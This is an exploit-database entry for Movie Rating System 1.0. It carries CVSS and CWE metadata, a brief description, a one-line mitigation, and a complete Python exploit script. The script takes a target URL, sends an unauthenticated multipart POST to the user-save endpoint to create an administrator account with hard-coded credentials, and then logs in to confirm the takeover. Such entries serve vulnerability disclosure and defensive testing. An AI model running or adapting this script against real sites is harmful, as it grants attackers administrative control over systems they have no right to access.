Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)

vendor:

Movie Rating System

by:

Tagoletta (Tagmaç)

8.8

CVSS

HIGH

Broken Access Control

287

CWE

Product Name: Movie Rating System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:movie_rating_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows

2021

Movie Rating System 1.0 – Broken Access Control (Admin Account Creation) (Unauthenticated)

This exploit allows an unauthenticated user to create an admin account on the Movie Rating System 1.0 application. The exploit is achieved by sending a POST request to the classes/Users.php?f=save endpoint with the required parameters. Once the admin account is created, the attacker can log in to the application using the credentials provided.

Mitigation:

Ensure that access control checks are properly implemented and enforced.

Source

Exploit-DB raw data:

# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows

import requests
import json

url = input('Url:')
if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"

Username = "tago"
Password = "tagoletta"

reqUrl = url + "classes/Users.php?f=save"

reqHeaders = {
    "Accept": "*/*",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
    "Origin": url}

reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n"

resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)

if resp.status_code == 200:
    print("Admin account created")
    reqUrl = url + "classes/Login.php?f=login"

    reqHeaders = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
        "Origin": url
        }

    reqData = {"username": ""+Username+"", "password": ""+Password+""}

    resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)

    data = json.loads(resp.text)
    status = data["status"]

    if status == "success":
        print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password)
    else:
        print("Exploited but not loginned")
else:
    print("Not injectable")